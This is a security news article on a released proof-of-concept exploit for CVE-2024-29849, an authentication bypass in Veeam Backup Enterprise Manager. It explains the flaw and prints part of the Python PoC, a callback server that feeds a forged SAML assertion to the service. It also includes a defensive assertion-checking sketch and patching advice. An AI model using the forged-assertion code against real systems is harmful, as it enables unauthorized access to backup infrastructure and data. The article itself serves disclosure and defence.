PoC Exploit Released For Veeam Authentication Bypass Vulnerability

A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

The vulnerability, tracked as CVE-2024-29849, carries a CVSS score of 9.8, placing it in the critical severity band.

This article covers the details of the vulnerability, the exploit, and the implications for organizations running Veeam's software.

CVE-2024-29849: The Vulnerability

On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.

The vulnerability resides in Veeam.Backup.Enterprise.RestAPIService.exe, the REST API server component of Veeam Backup Enterprise Manager.

This service listens on TCP port 9398 and exposes an API counterpart of the main web application, which runs on TCP port 9443.


Technical Analysis of the Exploit

The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.

This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.

The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.

The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.

The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.
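As an added illustration, not part of the original article or of Kheirkhah's PoC, the following Python sketch shows the relying-party checks that an assertion like the one served by the callback server should fail: its issuer is not on a trust list, it carries no signature, it names no subject or validity window, and it tries to vouch for itself with a Status element. The trusted issuer URL, both sample assertions and the helper names are constructed for this example; the code does not describe how Veeam's RestAPIService actually validates tokens.

```python
import xml.etree.ElementTree as ET

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
DSIG_NS = "http://www.w3.org/2000/09/xmldsig#"

# Issuers this relying party trusts. Constructed placeholder; a real deployment
# would load this from configuration together with each issuer's certificate.
TRUSTED_ISSUERS = {"https://sts.corp.example/STSService"}

# Constructed sample modelled on the assertion served by the PoC's callback server:
# an untrusted issuer, no signature, and a Status element vouching for itself.
UNTRUSTED_ASSERTION = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>
  <saml2:Status>
    <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>
  </saml2:Status>
</saml2:Assertion>"""

# Constructed sample of an assertion that is structurally sound: trusted issuer,
# a Signature element (contents are a placeholder), a Subject and a validity window.
STRUCTURALLY_SOUND_ASSERTION = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"
                 xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
  <saml2:Issuer>https://sts.corp.example/STSService</saml2:Issuer>
  <ds:Signature><ds:SignatureValue>PLACEHOLDER</ds:SignatureValue></ds:Signature>
  <saml2:Subject><saml2:NameID>alice</saml2:NameID></saml2:Subject>
  <saml2:Conditions NotBefore="2024-05-21T00:00:00Z" NotOnOrAfter="2024-05-21T00:05:00Z"/>
</saml2:Assertion>"""


def check_assertion(xml_text, trusted_issuers=TRUSTED_ISSUERS):
    """Return the list of reasons to reject the assertion; an empty list means it
    passed these structural checks (cryptographic signature verification is a
    separate, mandatory step not shown here)."""
    reasons = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]

    if root.tag != f"{{{SAML_NS}}}Assertion":
        return ["root element is not a SAML 2.0 Assertion"]

    # 1. Trust comes from who issued the token, never from the token's own claims.
    issuer = root.findtext(f"{{{SAML_NS}}}Issuer")
    if issuer is None or issuer.strip() not in trusted_issuers:
        reasons.append(f"issuer {issuer!r} is not a trusted STS")

    # 2. An unsigned assertion proves nothing about its origin.
    if root.find(f"{{{DSIG_NS}}}Signature") is None:
        reasons.append("assertion carries no XML signature")

    # 3. A usable assertion must say who it is about and for how long it is valid.
    if root.find(f"{{{SAML_NS}}}Subject") is None:
        reasons.append("assertion names no Subject")
    if root.find(f"{{{SAML_NS}}}Conditions") is None:
        reasons.append("assertion has no Conditions (validity window / audience)")

    # 4. A Status element belongs to the WS-Trust response wrapper, not to the
    #    assertion; a token announcing itself as 'valid' is a red flag.
    if root.find(f"{{{SAML_NS}}}Status") is not None:
        reasons.append("assertion asserts its own validity via a Status element")

    return reasons


def is_acceptable(xml_text, trusted_issuers=TRUSTED_ISSUERS):
    """True only when no structural rejection reason was found."""
    return not check_assertion(xml_text, trusted_issuers)


if __name__ == "__main__":
    for label, doc in (("PoC-style", UNTRUSTED_ASSERTION),
                       ("structurally sound", STRUCTURALLY_SOUND_ASSERTION)):
        verdict = check_assertion(doc)
        print(f"{label}: {'ACCEPT' if not verdict else 'REJECT'}")
        for reason in verdict:
            print(f"  - {reason}")
```

Testing for the presence of a ds:Signature element is only a structural stand-in: a real implementation must cryptographically verify that signature against the certificate of the issuer it found in its trust list, and enforce the Conditions window and audience, before honouring the Subject. The point the PoC makes is that an assertion which fails every one of these checks was still accepted.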

Figure 1: Diagram illustrating the authentication bypass exploit process.

Proof of Concept (PoC) Code

The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.

Below is a snippet of the PoC code:

```python
from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import warnings
import base64
import requests
from urllib.parse import urlparse
from threading import Thread
import os

warnings.filterwarnings("ignore", category=DeprecationWarning)
requests.packages.urllib3.disable_warnings()

class CustomHandler(SimpleHTTPRequestHandler):
    # Answers the service's SAML request with the attacker-supplied assertion
    def do_POST(self):
        xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
                            <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>
                            <saml2:Status>
                                <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>
                            </saml2:Status>
                          </saml2:Assertion>'''
        self.send_response(200)
        self.send_header("Content-type", "text/xml")
        self.end_headers()
        self.wfile.write(xml_response.encode("utf-8"))
        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")

def start_callback_server(ip, port):
    # HTTPS callback server; expects server.pem / key.pem in the working directory
    httpd = HTTPServer((ip, port), CustomHandler)
    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")
    httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)
    print(f"(*) Callback server listening on https://{ip}:{port}")
    httpd.serve_forever()

# Additional code for exploit execution...
```

Figure 2: Snippet of the PoC exploit code.

Implications and Mitigation

The release of this PoC exploit underscores the critical nature of CVE-2024-29849.

Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.

An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.

Veeam recommends updating immediately to the latest version of the software, which includes the patch for this vulnerability.

Additionally, organizations should review their security configurations and consider additional layers of defense, such as multi-factor authentication (MFA) and network segmentation, to reduce the risk of exploitation.

The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.

It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.


Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
